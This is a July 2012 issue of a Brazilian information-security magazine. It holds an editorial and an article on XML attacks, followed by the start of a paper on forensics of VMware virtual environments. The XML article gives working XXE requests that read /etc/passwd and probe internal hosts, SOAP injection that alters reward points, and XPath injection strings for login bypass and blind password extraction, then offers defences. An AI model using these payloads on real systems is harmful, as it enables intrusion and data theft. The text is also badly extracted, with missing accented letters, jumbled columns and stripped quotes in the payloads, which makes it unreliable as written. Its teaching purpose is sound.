7 Edicao Julho 31 07 2012

VOC PODE:
Copiar, distribuir, criar obras derivadas e exibir a obra.
Licena
COM AS SEGUINTES CONDIES:
Dar crdito ao autor original e a Revista Segurana Digital, citando o nome do autor (quando disponvel) e endereo do projeto.
Voc no pode utilizar esta obra como fonte comercial. Este direito de total exclusividade do titular responsvel por manter o site Segurana Digital.
Compartilhamento pela mesma Licena. Se voc alterar, transformar, ou criar outra obra com base nesta, voc somente poder distribuir a obra resultante sob uma licena idntica a esta.
O Projeto Segurana Digital apia o compartilhamento gratuito de informaes e conhecimento, mas ao mesmo tempo defende o fato de que, ao distribuir a obra de outra pessoa ou entidade voc dever citar a fonte original desta, dando assim crdito ao seu autor. Esta revista no poder ser comercializada sem au torizao prvia do responsvel Fbio Jnio Lima Ferreira. O Projeto Segurana Digital garante a gratuidade desta edio. A mesma poder ter uma verso impres sa paga, porm a verso digital no poder, em hiptese alguma, ser comercializada. S ser permitida uma verso impressa para cunho comercial sobre autorizao prvia do titular da comunidade. A comercializa o da verso impressa desta revista sem autorizao prvia constitui crime previsto nas leis n 6.895 e 10.695. Pargrafo que respalda esta revista: 1 Lei n 6.895 Se a violao consistir em reproduo, por qualquer meio, com intuito de lucro, de obra intelectual, no todo ou em parte, sem a autorizao expressa do autor ou de quem o represente, ou consistir na reproduo de fonograma ou videograma, sem autorizao do produtor ou de quem o represen te. Cada autor responsvel por seu artigo, desta forma o Projeto Segurana Digital no se responsabiliza por quebra de direitos autorais, por qualquer colaborador.
|02
Julho 2012 segurancadigital.info
Era uma idia despretensiosa, tal como um sonho que no incio somente uma pequena semente, que precisa de aes concretas para sair da imaginao e tornar algo visvel. Vrias aes foram necessrias e fundamentais para fazer a diferena e com muito esforo o que era algo talvez intangvel, tornouse real e ela nasceu, pequena, sem chamar muita ateno. Desde ento, ela teve o poder de contagiar outras pessoas da rea de tecnologia, annimos ou famosos, experientes ou no, que comearam a se envolver doando seu tempo e seu talento para contribuir com o seu crescimento atravs de dicas, sugestes e crticas, vrias delas de muita utilidade. Com o passar dos meses, era visvel a sua evoluo, seja no contedo (com o objetivo de ser relevante) quanto no visual (mais leve, bonito e agradvel de ver). No bocaaboca (real ou virtual), seu nome era cada vez mais conhecido e crescia ainda mais o nmero dos seguidores, que como ns, viam uma lacuna sendo preenchida, uma publicao brasileira que tratasse do tema Segurana da Informao. Mas ainda muito pouco para um pas que est entre os lderes de atividade criminosa na internet. A quantidade de vtimas, em sua grande maioria, por ignorncia sobre o tema assustador. Precisamos que a segurana digital seja um tema decorrente na vida diria de todas as pessoas (de crianas a idosos), no somente dos profissionais de TI. Quantos roubos online poderiam ter sido evitados com simples dicas: no use senhas fceis, troque suas senhas periodicamente e no as compartilhe com ningum. A sua participao foi fundamental para o 1 ano de vida da Revista Segurana Digital. Sem os nossos leitores, a revista no teria razo de existir. A edio especial deste ms est recheada de sorteios de livros e cursos para vocs. Que esta seja apenas a primeira de muitas outras edies de aniversrio que viro.
DIRETOR E DIAGRAMADOR Fbio Jnio Lima Ferreira fabiojanio@segurancadigital.info EDITORESCHEFE Johnantan Pereira johnantan.pereira@gmail.com Luiz Felipe Ferreira lfferreira@gmail.com EDITOR DE ARTE Hlio Jos Santiago Ferreira COLUNISTAS Bruno Cesar Moreira de Souza bruno.souza@ablesecurity.com.br Deivison Franco deivison.pfranco@gmail.com Eduardo Alves N. Da Silva eduardoalves19@gmail.com Ivanildo Galvo ivanildogalvao@gmail.com Jorge Daniel jorgdaniel@gmail.com Leonardo Pereira Guimaraes leonardo.pereira.guimaraes@gmail.com Lgia Barroso ligiabarroso@hotmail.com Ngila Magalhes nagilamagalhaes@gmail.com Thiago Fernandes Gaspar Caixeta thiago.caixeta@gmail.com Yuri Diogenes yuridiogenes@hotmail.com
Editorial
Oel Ngati Kameie.
REVISO Andressa Findeis findeis.andressa@gmail.com Mauro Jnior maurompjunior@gmail.com Raiana Pereira raianagomes@yahoo.com.br
Por Luiz Felipe Ferreira

@lfferreiras lfferreira@gmail.com
http://twitter.com/_SegDigital www.facebook.com/segurancadigital www.youtube.com/segurancadigital www.segurancadigital.info
|03
ndice
isRio Information Security Rio
05
Parceiros
4Linux 50
Artigo
Ataques em XML Anlise Forense Computacional de Ambientes Virtualizados na Plataforma VMWare OWAS Floripa Conhecimento Motivao Flame: novo captulo de uma guerra ciberntica? Governana da Segurana da Informao Como demonstrar valor das aes de segurana para a empresa? Os Meios Jurdicos De Proteo Dos Bancos De Dados: Uma Necessidade Estratgica De Negcio Os Perigos dos Servios de Armazenamento de Dados na Nuvem Perito Forense Computacional, Por Onde Comear? Sistema de Firewall no estilo Appliance Solues de UTM Unified threat management
Brasport
51 53 54 55 56
06 13 22 23 26
Academia Clavis Data Security HostDime Kryptus
Depoimento do fundador do projeto
57
29 34 37 39 43 45 47
58 Agenda TI
Confira o calendrio dos profissionais de TI
59 Notcias
Fique informado quanto ao que acontece no mundo virtual.
60 Coluna do leitor
Entre em contato e contribua com a revista
|04
|05
Como Atacantes Podem Manipular sua Aplicao?
Ataques em XML
1. Introduo
O XML (eXtensible Markup Language) uma lin guagem de marcao, criada pela W3C, permitindo descrever diversos tipos de dados. Foi criada para fa cilitar o compartilhamento de informaes atravs de sistemas, especialmente pela Internet. O XML com bina o flexvel padro SGML (Standard Generalized Markup Language) com o padro de sintaxe simples HTML (HyperText Markup Language). No padro XML, os dados so organizados de forma hierrqui ca, permitindo a criao de banco de dados, textos formatados e at mesmo imagens vetoriais. Este pa dro tambm facilita a comunicao entre sistemas distintos, permitindo, por exemplo, que um banco de dados seja exportado atravs de XML e importado em outro banco de dados. Apresento, nos prximos tpicos, os ataques mais conhecidos em aplicaes web utilizando o padro XML. Profissionais de segurana e desenvolvedores devem estar especialmente atentos a estes ataques j que existe uma crescente tendncia ao uso de XML para comunicao entre componentes de aplicaes web. Inclusive, muitas aplicaes mveis utilizam um browser ou um cliente customizado para se co municar com o servidor, utilizando APIs baseadas em HTTP e XML. importante destacar que no apre sento aqui todos os tipos possveis de ataque explo
rando XML. Caso o leitor queira se aprofundar no assunto, as referncias utilizadas como base para ela borao deste artigo contm mais informaes sobre ataques no processamento de XML.
2. XML External Entity (XXE) Attack

Em meus trabalhos de testes de intruso em apli caes, tenho observado nos ltimos anos um au mento no nmero de aplicaes que utilizam o padro XML para envio de dados entre o browser e o servidor web. Aps a requisio XML ser enviada ao servidor, a aplicao, no lado servidor, processa os dados enviados e retorna uma resposta, geralmente tambm em XML. Este comportamento tpico de aplicaes que utilizam a tecnologia AJAX (Asynch ronous Javascript and XML), porm podese obser var este mesmo comportamento em outras tecnologias utilizadas em aplicaes web. Considere uma aplicao que permite realizar buscas em uma base de clientes. Por exemplo, quan do o usurio realiza uma busca por um nome de cli ente, o browser envia a seguinte consulta XML ao servidor: POST /clientes/busca/ListaClientes.php HTTP/1.1 Host: localhost ContentType:text/xml charset=utf8 ContentLength: XXX
|06
ARTIGO Segurana Digital <ListaClientes><NomeCliente>Teste</NomeCliente></ ListaClientes>

daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ...
A aplicao poderia responder da seguinte forma:

HTTP/1.1 200 OK ContentType:text/xml charset=utf8 ContentLength: XXX <ListaClientes><NomeCliente>No foi encontrado cliente com o nome Teste</NomeCliente></ListaClientes>
Caso a entrada de dados no seja adequadamente validada ou tratada, a aplicao pode estar vulnervel a XML external entity (XXE) attack. Isto ocorre porque as bibliotecas que processam XML permitem o uso de referncias a entidades. Por exemplo, pode se criar a seguinte entidade de referncia:
[!DOCTYPE exemplo [ <!ENTITY cliente ClienteTeste > ]>
Se o texto XML incluir esta definio acima, a bi blioteca que processa o XML ir substituir as ocor rncias da entidade &cliente em qualquer posio do texto pelo valor definido: ClienteTeste. O perigo que o padro XML aceita o uso de re ferncias externas, incluindo URLs, arquivos e dire trios. Por exemplo, um atacante poderia explorar a aplicao para ler arquivos arbitrrios do sistema:
POST /clientes/busca/ListaClientes.php HTTP/1.1 Host: localhost ContentType:text/xml charset=utf8 ContentLength: XXX [!DOCTYPE exemplo [ <!ENTITY ataque SYSTEM file:///etc/passwd > ]> <ListaClientes><NomeCliente>&ataque</NomeClient e></ListaClientes>
A aplicao retornaria todo o contedo do arquivo /etc/passwd. Este ataque pode ser utilizado para ler arquivos sensveis do sistema operacional, arquivos contendo chaves criptogrficas, cdigo fonte da apli cao e arquivos de configurao contendo senhas de banco de dados. Atravs das informaes obtidas em arquivos sensveis, um atacante pode conseguir com prometer toda a segurana da aplicao e/ou da in fraestrutura que suporta a aplicao. Esta mesma tcnica pode ser utilizada para outros ataques: Realizar varreduras de portas em hosts protegidos por firewall Acessar sites internos da organizao, no acessveis pela Internet Utilizar o servidor web como proxy para acessar ou atacar outros sites na Internet Roubar credenciais NTML ao forar o servidor a acessar compartilhamento controlado pelo atacante Realizar ataque de negao de servio contra o servidor da aplicao. O exemplo abaixo mostra como possvel forar a aplicao a acessar uma URL atravs de um ataque XXE. Suponha que o servidor da aplicao afetada possua acesso ao web site da Intranet da organizao alvo.
POST /clientes/busca/ListaClientes.php HTTP/1.1 Host: localhost ContentType:text/xml charset=utf8 ContentLength: XXX [!DOCTYPE exemplo [ <!ENTITY ataque SYSTEM http://intranet > ]> <ListaClientes><NomeCliente>&ataque</NomeClient e></ListaClientes>
Se a aplicao estivesse vulnervel, a seguinte resposta seria retornada:

HTTP/1.1 200 OK ContentType:text/xml charset=utf8 ContentLength: XXX <ListaClientes><NomeCliente>No foi encontrado cliente com o nome root:x:0:0:Root User:/root:/bin/bash bin:x:1:1:Binary Installation User:/bin:/sbin/nologin
Um atacante tambm pode utilizar a aplicao pa ra realizar uma varredura de portas em hosts inter nos, protegidos por firewall, atravs de um script que teste diferentes portas e endereos IP. Veja o seguinte exemplo:
POST /clientes/busca/ListaClientes.php HTTP/1.1 Host: localhost ContentType:text/xml charset=utf8
|07
ARTIGO Segurana Digital
ContentLength: XXX [!DOCTYPE exemplo [ <!ENTITY ataque SYSTEM http://10.1.1.2:22 > ]> <ListaClientes><NomeCliente>&ataque</NomeCliente ></ListaClientes>
pode ser utilizado para consumir a memria de um servidor, tornandoo indisponvel.
3. SOAP Injection
O SOAP (Simple Object Access Protocol) utili zado para envio de mensagens entre sistemas, encap sulando dados, atravs do padro XML. O uso mais comum do protocolo SOAP em Web Services. Para quem no conhece, Web Services so componentes, acessveis remotamente, que permitem o uso de fun es, de forma padronizada, por diferentes sistemas e aplicaes de uma organizao. Em aplicaes web, normalmente, o SOAP utilizado na comunicao entre a aplicao web e componentes internos. Como o protocolo SOAP utiliza a linguagem XML para comunicao, podese realizar ataques de injeo de XML caso a aplicao no valide ou trate a entrada de qualquer dado utilizado para montar a requisio SOAP. Como exemplo, considere uma aplicao de jogos online que permite o recebimento de prmios com base em pontos acumulados, envian do a seguinte requisio do browser do usurio ao servidor para utilizar os pontos acumuladas na aqui sio de um prmio:
POST /premio/ResgataPremio.jsp HTTP/1.1 Host: localhost ContentType:text/xml charset=utf8 ContentLength: XXX Cookie: sessiondID=xxxxxxxxxxxxxxxxxxxxx idPremio=4551&codUsuario=3992&MetodoEntrega=2
Atravs de diferenas de tempo na resposta, o script pode conseguir determinar se a porta est aber ta ou fechada no host alvo. H tambm a possibilidade de realizar ataques de negao de servio (Denial of Service) atravs de vulnerabilidades de XXE. Por exemplo, podese fa zer o componente que processa XML ler um arquivo continuamente e sem parar:
[!DOCTYPE exemplo [ <!ENTITY ataque SYSTEM file:///dev/random > ]> <ListaClientes><NomeCliente>&ataque</NomeCliente ></ListaClientes>
Um ataque de negao de servio atravs de XXE muito conhecido denominado como Billion laughs (Bilhes de Risadas). Para entender este ata que preciso conhecer a possibilidade de recurso no XML Document Type Definition (DTD).
[!DOCTYPE exemplo [ <!ENTITY empresa Exemplo Ltda. > <!ENTITY cliente Razo Social: &empresa > ]>
Explorando esta possibilidade, um atacante pode criar um pequeno DTD que recursivamente carregue na memria um nmero de bytes altssimo, como no exemplo abaixo:
Depois de inicialmente processar esta transao de recuperao de prmio e obter do banco de dados o valor em pontos do prmio solicitado, bem como validar que o usurio possui quantidade de pontos suficiente para o resgate, a aplicao finalizaria a operao de recuperao de prmio atravs de um Web Service.
<soap:Envelope xmlns:soap=http://www.w3.org/2001/12/soap envelope> <soap:Body> <pre:Add xmlns:pre=http://target/lists soap:encodingStyle=http://www.w3.org/2001/12/soap encoding> <Resgate> <idPremio>4551</idPremio> <codUsuario>3992</codUsuario>
Fonte: http://en.wikipedia.org/wiki/Billion_laughs.
Quando o XML acima processado, a entidade &lol9 substituda pela sequncia de entidades &lol8. E cada entidade &lol8 substituda por uma sequncia de entidades, e assim sucessivamente. O resultado que este pequeno XML acima gera uma mensagem de 1 bilho de risadas (lols), ocupando 3GB de memria. fcil perceber que este ataque
|08
<Pontos>2500</Pontos> <MetodoEntrega>2</MetodoEntrega> </Resgate> </pre:Add> </soap:Body> </soap:Envelope>
Um atacante pode subverter a segurana desta aplicao atravs de uma entrada de dado que modi fique a requisio SOAP enviada ao servidor interno acessado pela aplicao.
POST /premio/ResgataPremio.jsp HTTP/1.1 Host: localhost ContentType:text/xml charset=utf8 ContentLength: XXX Cookie: sessiondID=xxxxxxxxxxxxxxxxxxxxx idPremio=4551&codUsuario=3992</codUsuario><Pon tos>0</Pontos><!&MetodoEntrega=2 ><MetodoEntrega>2
acima ter utilizado uma hipottica aplicao de jo gos, este tipo de vulnerabilidade pode afetar diversos tipos de aplicaes, incluindo aplicaes financeiras e de comrcio eletrnico. Um ataque de SOAP Injec tion pode ter srias consequncias, permitindo que um atacante consiga subverter completamente a se gurana da aplicao. A explorao de SOAP Injection, em muitos ca sos, exige que o atacante consiga mapear toda ou parte da estrutura da requisio SOAP, conhecendo nomes de tags. Em alguns casos, devido a um trata mento inadequado de mensagens de erro, a aplicao pode revelar informaes sobre a requisio SOAP ao atacante. No entanto, pode ser que o atacante no tenha qualquer informao til que o permita conhe cer a estrutura da requisio SOAP. Caso no consiga acesso ao cdigo da aplicao, provavelmente, ter que fazer ataques de deduo, sem garantia de suces so.
A sequncia de caracteres <! usada para abrir comentrios no XML e a sequncia > usada para fechar os comentrios. Com o ataque acima, a aplica o iria inserir uma tag <Pontos>0</Pontos> na re quisio SOAP e comentar parte da requisio, removendo a tag <Pontos> original, contendo o valor de pontuao necessrio para resgatar o prmio.
<soap:Envelope xmlns:soap=http://www.w3.org/2001/12/soap envelope> <soap:Body> <pre:Add xmlns:pre=http://target/lists soap:encodingStyle=http://www.w3.org/2001/12/soap encoding> <Resgate> <idPremio>4551</idPremio> <codUsuario>3992</codUsuario><Pontos>0</Pontos ><!</codUsuario> <Pontos>2500</Pontos> <MetodoEntrega>2 ><MetodoEntrega>2</MetodoEntrega> </Resgate> </pre:Add> </soap:Body> </soap:Envelope>
4. Ataques de Negao de Servio em Web Services

O processamento de mensagens e arquivos XML pode consumir muitos recursos de CPU e memria. Ataques podem ser realizados para explorar esta ca racterstica, atravs do envio de contedo XML mal formado ou muito longo. Considere o seguinte exemplo em que um nome de atributo inserido com um tamanho absurdamente longo (exemplo: 700 MB):
<?xml version=1.0 encoding=UTF8?> <soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/ > <soap:Body> <AAAA<!Nome de Elemento com Tamanho Extremamente Longo>AAAAA> <!Valor Qualquer> </AAAA<!Nome de Elemento com Tamanho Extremamente Longo>AAAAA> </soap:Body> </soap:Envelope>
Assim, o atacante conseguiria resgatar o prmio sem gastar pontos acumulados. Apesar do exemplo
Este tipo de ataque possvel porque o padro XML no limita o tamanho dos componentes em tags XML. No exemplo acima, o atacante teria que ter possibilidade de enviar requisio SOAP para um Web Service ou teria que explorar com sucesso uma vulnerabilidade de SOAP Injection. Caso o desen volvedor no tenha estabelecido limites de tamanho
|09
para cada elemento, atributo e valor de atributo, pro vavelmente o Web Service vulnervel. Para mais informaes sobre este tipo de ataque, consulte os seguintes links: http://clawslab.nds.rub.de/wiki/index.php/Oversize d_XML_DOS https://www.owasp.org/index.php/Testing_for_XML _Structural_(OWASPWS003)
//usuario[login/text= " & Request("login") & " and password/text= " & Request("password") & "]
Caso o usurio digite o login teste e senha naosei, a aplicao realizaria a seguinte consulta XPATH:
//usuario[login/text=teste and password/text=naosei]
5. XPATH Injection
O XPATH (XML Path Language) uma lingua gem interpretada para consulta de dados armazena dos em documentos XML. Apesar de o padro XML no ser geralmente utilizado para armazenamento de grande quantidade de dados em bancos de dados cor porativos, utilizase com frequncia documentos XML para armazenar dados de configurao utiliza dos de forma dinmica na aplicao. E algumas apli caes utilizam documento XML para armazenar informaes de credenciais de usurios, privilgios e perfis de acesso. Considere o seguinte trecho de um documento XML utilizado para autenticao e controle de aces so:
<acesso> <usuario> <login>marcelo</login> <privilegio>admin</privilegio> <password>D0nthackme</password> <email>marcelo@teste.com</email> <cpf>111.111.11111</cpf> </usuario> <usuario> <login>joao</login> <privilegio>user</privilegio> <password>esqueciasenha</password> <email>joao@teste.com</email> <cpf>222.222.22222</cpf> </usuario> </acesso>
Como no existe nenhum node com os valores de login e senha correspondentes consulta acima, a aplicao retornaria uma mensagem de erro de au tenticao para o usurio. No entanto, um atacante poderia entrar os seguin tes valores de usurio e senha:
Usurio: or a=a Senha: or a=a
Neste caso, a aplicao realizaria a seguinte con sulta XPATH:

//usuario[login/text= or a=a and password/text= or a=a]
Como a consulta acima retorna todos os usurios cadastrados, o atacante provavelmente conseguir se autenticar na aplicao. Os ataques de XPATH Injection tambm podem ser utilizados para extrair dados sensveis armazena dos em documentos XML. Considere que esta mes ma aplicao lista os dados do usurio (login, privilgio, email e CPF) na pgina inicial aps uma autenticao bem sucedida, passando o parmetro de login como mostra o exemplo abaixo:
http://www.vulneravel.com/entrada.jsp?login=joao
Para obter os dados do usurio joao, por exemplo, a aplicao realiza a seguinte consulta XPATH:
//usuario[login/text=joao]
Um atacante poderia forar a aplicao a listar os dados de todos os usurios atravs do seguinte ata que:
http://www.vulneravel.com/entrada.jsp?login=joao or a=a
Por exemplo, para listar o endereo de email do usurio joao, a aplicao faria a seguinte consulta XPATH:
//usuario[login/text()=joao]/email/text()
A seguinte consulta XPATH seria realizada:

//usuario[login/text=joao or a=a]
Imagine que a aplicao realiza autenticao atra vs deste documento XML, utilizando a seguinte consulta:
Neste caso, a aplicao retornaria os dados de to dos os usurios, incluindo dados sensveis como o
|10
nmero de CPF. No entanto, nem sempre to fcil realizar ata ques de XPATH Injection para extrair informaes sensveis de documentos XML. s vezes necess rio realizar ataques utilizando tcnicas de inferncia para extrair dados byte por byte. Considere o exem plo anterior de autenticao. Se o atacante colocar o valor abaixo no campo Senha, a seguinte consulta XPATH ser realizada, resultando em erro de autenti cao:
or 1=2 and a=a //usuario[login/text=joao and password/text= or 1=2 and a=a]
Isto resultaria na seguinte consulta XPATH:

//usuario[login/text=joao and password/text= or substring(name(parent::*[position()=1]),1,1)=u]
Como o primeiro caractere do node pai (usua rio) u, a aplicao retornaria uma autenticao bem sucedida. Um atacante poderia desenvolver um script para percorrer toda a tabela ASCII e todas as posies para determinar o nome do node pai. Em seguida, o atacante pode utilizar um script para obter todos os nodes filhos (child) atravs da mesma tcni ca. Este exemplo suficiente para mostrar que um atacante pode conseguir extrair dados atravs de ata ques de XPATH Injection mesmo sem possuir infor maes sobre a estrutura da base de dados XML.
Agora, se o atacante colocar o valor abaixo no campo Senha, a autenticao ser bem sucedida:
or 1=1 and a=a //usuario[login/text=joao and password/text= or 1=1 and a=a]
6. Como Prevenir
Para prevenir ataques de XXE(XML external en tity) e de SOAP Injection, devese realizar forte vali dao e tratamento na entrada de dados, evitando referncias a entidades e tags. Em especial devese ter cuidado com caracteres especiais utilizados em sintaxe XML, como os caracteres > < / e &. A mes ma recomendao aplicase para evitar falhas de XPath Injection, rejeitando ou tratando caracteres que podem influenciar em consultas XPath, incluindo ( ) = [ ] : , * e /. A melhor abordagem de validao de entrada de dados a abordagem whitelist, na qual apenas os caracteres estritamente necessrios so aceitos pela aplicao. Para evitar ataques de XXE (XML external entity) devese ter um cuidado especial no design da aplica o, evitando que o cliente possa especificar mensa gens XML completas, especialmente, impedindo que o usurio possa especificar XML Document Type Definition (DTD). Podese tambm configurar o componente que processa o XML para no resolver entidades, o que necessrio para ataques de XXE. Para se proteger de ataques de negao de servio atravs de Web Services, devese ter cuidado na vali dao do schema XML, estabelecendo limites de ta manho para cada elemento, atributo e valor de atributo, bem como limites nas quantidades de atri butos, e realizando validao rigorosa nos parmetros enviados. Mensagens XML invlidas devem ser ime diatamente rejeitadas antes de realizar processamento com potencial de consumir muitos recursos do servi dor. Para mais informaes sobre proteo contra ataques de negao de servio envolvendo processa mento de XML, interessante consultar o WSAt
Com este simples exemplo, podese constatar a possibilidade de causar respostas diferentes na apli cao atravs de manipulao da lgica da consulta XPATH. Um atacante pode usar estas diferentes res postas para extrair informaes caractere a caractere. Veja o seguinte exemplo:
//usuario[login/text=joao and password/text= or //usuario[login/text=marcelo and substring(password/text(),1,1)=0] and a=a]
A consulta acima resultaria em autenticao bem sucedida se o primeiro caractere da senha do login marcelo fosse 0 ou resultaria em erro de autenticao caso o primeiro caractere da senha do login marcelo fosse diferente de 0. Um atacante poderia desenvol ver um script para testar caractere a caractere e posi o a posio utilizando operadores lgicos para extrair as senhas dos usurios.. O ataque acima depende de o atacante conhecer a estrutura do documento XML. Em um ataque real mente cego (Blind XPath Injection), o atacante preci sa utilizar consultas relativas ao node atual para conseguir extrair as informaes. Um atacante pode, por exemplo, utilizar esta tcnica para obter o nome do node pai, colocando o seguinte valor no campo Senha:
or substring(name(parente::*[position()=1]),1,1)=u
|11
tacks.org: http://clawslab.nds.rub.de/wiki/index.php/Main_Page
7. Referncias
The Web Application Hackers Handbook Finding and Exploiting Security Flaws 2nd Edition Dafydd Stuttard Marcus Pinto OWASP The Open Web Application Security Project (https://www.owasp.org) Flash Talk XML DTD Attacks Jesse Ou Cigital OWASP Poland 2010 XXE (Xml eXternal Entity) Attack Gregory Steuck (http://www.securiteam.com/securitynews/6D0100A5PU.html) WSAttacks.org (http://clawslab.nds.rub.de/wiki/index.php/Main_Page) XML Denial of Service Attacks and Defenses (http://msdn.microsoft.com/enus/magazine/ee335713.aspx) Billion Laughs Wikipedia (http://en.wikipedia.org/wiki/Billion_laughs)
Bruno Cesar Moreira de Souza

Scio e Diretor Tcnico da Able Security, CISSP desde Jan/2007, OSCP, GCFE, Bacharel em Siste mas de Informao pela PUCRio, com mais de 11 anos de experin cia em segurana da informao, especialista em testes de intruso e percia forense computacional. Tem prestado consultoria para organizaes de diversos segmentos, no Brasil e no Reino Unido. Twitter: @brunocmsouza Email: bruno.souza@ablesecurity.com.br Site: http://www.ablesecurity.com.br
|12
Anlise Forense Computacional de Ambientes Virtualizados na Plataforma VMWare

Resumo Tratase de um estudo a respeito de Anlise Forense Computacional de Ambientes Virtu ais. Apresenta uma viso sobre ambientes virtuais su as implicaes em anlises forenses computacionais, mostrando seus componentes, conceitos e aspectos de segurana, abrangendo os avanos tecnolgicos das ferramentas de virtualizao, dos mtodos e das questes de investigao forense digital. Para isso, foi mostrada a interao dos processos de virtualiza o com os processos de anlise forense computacio nal indicados os problemas (fragilidades luz forense) da virtualizao e se discutiu mtodos, bem como questes de anlise forense computacional des se tipo de ambiente. PalavrasChave: Virtualizao, Ambientes Virtu ais/Virtualizados, Mquinas Virtuais, Forense Com putacional, Segurana, Ataques, Crime, Investigao, Percia.
I Introduo
O crescimento e a evoluo dos ambientes e das infraestruturas de TI trazem a necessidade de alterna tivas para simplificao, aumento de produtividade e reduo de custos. Para esse fim, a virtualizao se mostra como uma das melhores e mais eficientes op es a serem adotadas. Contudo, sua tcnica cria no
vos desafios e dificuldades s anlises forenses computacionais (GALVO, 2009). Nesse contexto, e ainda para MORRISON (2009), a virtualizao surge como uma forma de esconder e melhor distribuir e utilizar as caractersticas e recur sos fsicos de uma plataforma computacional, por meio de um hardware virtual, emulando um ou mais ambientes isolados, virtualizandose desde seu hardware a sistema operacional e aplicativos. Ante ao exposto e para MARINS (2009) de vital importncia que se enfoque especial ateno aos quesitos de segurana inerentes e necessrios em ambientes virtuais, de modo a se possibilitar uma eficiente auditoria e processo de anlise forense computacional em casos de fraudes e/ou ilcitos que sejam executados nesses tipos de ambientes. Dessa forma, segundo MONTEIRO (2009) pretendese prevenir, restaurar e analisar vestgios e evidncias computacionais, tanto os componentes virtuais ou f sicos, quanto dados que foram processados ou aces sados eletronicamente e armazenados.
II Anlise Forense Computacional De Ambientes Virtuais

A proposta da virtualizao adequada para se trabalhar com imagens virtuais de mquinas reais sem modificlas. Antigamente esse processo reque
|13
ria ao perito clonar o hardware (HD), colocalo em um novo equipamento e inicializlo. Assim sendo, quando da primeira inicializao, o perito ainda no podia ter certeza se a imagem clonada estaria adequa da investigao. Dessa forma, sempre que houvesse qualquer suspeita de contaminao do clone, tornava se necessrio refazlo a partir de uma cpia vlida. Isso tudo era um processo demorado e que poderia ser facilmente contestado, uma vez que a integridade dos dados poderia ser potencialmente perdida e/ou questionada. Os sistemas operacionais e aplicativos executados em ambientes virtuais deixam diferentes tipos de ves tgios computacionais para serem analisados, o que resulta em novas evidncias e procedimentos na con duo de uma investigao quando da ocorrncia de um delito digital. Fator este que se agrava devido falta de tcnicas e/ou procedimentos direcionados execuo de sua anlise forense computacional. Baseandose em (MELO, 2009), em (OR MANDY, 2009) e em (BARRETT, 2010), observase que a conceituao da percia forense tradicional foi elaborada para tratar eventos que ocorrem no mundo real. No mundo virtual, sua demanda muito recente, ainda mais em se tratando de ambientes virtuais, isto , um mundo virtual dentro de um mundo virtual, e por falta de tcnicas forenses especficas para estes casos, procurase adaptar mtodos existentes para analisar as situaes ocorridas nesse tipo de ambien te. Com o avano da tecnologia, vrias solues sur giram para diminuir custos e aumentar a disponibili dade dos sistemas e servios oferecidos pelo setor de TI. Uma dessas solues a virtualizao de siste mas operacionais completos, o que possibilitou uma incrvel diminuio nos gastos com hardware para as organizaes. A virtualizao trouxe um novo paradigma com putacional, completamente diferente do anterior, on de no possvel se ter acesso memria fsica de sistemas virtualizados que compartilham os mesmo dispositivos de hardware. Nesse cenrio, como tudo virtualizado, os processos do sistema tambm o so, assim como os discos e mdias, que antes eram fsi cos. Nesse novo paradigma, nem aos servidores com os sistemas virtualizados h acesso fsico, e como os crimes e comprometimento de informaes no so prerrogativas apenas de sistemas tradicionais, essas mesmas questes tambm ocorrem em mquinas e
ambientes virtuais. Sendo que o problema nesse caso, que se torna necessrio entender como essa tecno logia funciona, como possvel realizar a anlise de seus dados e, principalmente, como utilizar essa tec nologia em benefcio prprio como luz da forense computacional, j que antigamente, o perito tinha que fazer uma nova imagem forense sempre que houves se risco de que a cpia que estava periciando pudesse ter sido modificada. Com a virtualizao h a possibilidade de se a atualizao da imagem periciada a qualquer tempo. Nas melhores prticas para as anlises forenses com putacionais de ambientes virtuais o perito tem que fazer dois clones do disco original para se proceder s fases propostas para a coleta de evidncias e per cia. Adaptandose as fases de um processo de compu tao forense tradicional, possvel incluir as etapas e o cenrio para a anlise forense computacional de ambientes virtuais, delimitandoas em: Acesso, Cole ta, Anlise e Relatrio. A primeira destinase ao acesso efetivo do perito ao ambiente a ser analisado. A segunda produo de imagens, para serem usadas na percia (tanto virtual quanto tradicional). A tercei ra anlise efetiva das imagens geradas pelo perito. Finalmente, a quarta corresponde elaborao de re latrios (laudo) acerca das anlises realizadas no am biente. Ante ao exposto, necessrio considerar alguns aspectos da computao forense que so afetados pe la virtualizao, pois existem vrios problemas com a investigao digital dentro de ambientes virtuais. So eles: A aquisio de dados dentro do ambiente Como coletar dados Quais dados coletar Como lidar com os dados que normalmente esto sempre em movimento Como respeitar a privacidade dos outros hosts que no esto sob investigao. Assim sendo, adiante ir se explicar o processo de transformao de evidncias digitais ocorridas em ambientes virtuais em algo que um perito possa usar e analisar com confiana. Destarte, ao usar uma m quina virtual, o contedo da mquina pode ser visto da mesma forma que o suspeito viu. Sendo que ainda ser discutido o conceito de melhores evidncias, bem como a aceitabilidade das provas obtidas a partir
|14
de instncias virtuais do computador de um suspeito, descrevendo um mtodo proposto que combina mto dos tradicionais com a tecnologia virtual para usu fruir dos benefcios da virtualizao e ainda atender aos rigores esperados pela investigao forense quan do da ocorrncia de delitos em ambientes virtuais.
ser usados para examinar mdia original sem escrever as alteraes em disco. Usando um bloqueador de gravao para proteger a mdia original, a unidade pode ser inicializado em uma mquina virtual sem alterar o contedo das provas. Esse processo varia e exige um ajuste dos arquivos de configurao das mquinas virtuais.
2.1 Mquinas Virtuais como Plataforma Forense Computacional

Dispositivos virtuais so imagens de VMs, geral mente com uma configurao especfica, projetado para executar em uma plataforma virtual. Eles so projetados para reduzir ou eliminar a instalao, con figurao e manuteno associadas ao funcionamento de grandes e complexas sutes de software. H uma srie de dispositivos virtuais disponveis para down load a partir de sites de fornecedores e que so cons trudos especificamente para a realizao de investigaes forenses. Ante ao exposto, observase que h um grande po tencial para o uso de ambientes virtuais no processo de anlise forense, mas h limites que devem ser en tendidos. Apesar de uma mquina virtual ser quase idntica a uma mquina fsica, existem diferenas que o hypervisor traz consigo, o que pode causar pro blemas em algumas situaes. Contudo, isso no des carta as vantagens do uso de VMs como plataforma de anlise forense computacional. A primeira vantagem a grande capacidade de se criar uma imagem forense em um ambiente virtual. Esse processo economiza uma enorme quantidade de tempo em relao alternativa de se restaurar uma imagem do hardware real (fsico) no qual o sistema operacional estava executando quando de sua replica o. Ao se tratar de ambiente virtual, o processo pode ser feito rapidamente e ser repetido tantas vezes quanto necessrias. Alm disso, outra vantagem que se possibilita uma inspeo visual do sistema operacional muito mais fcil e intuitiva, de 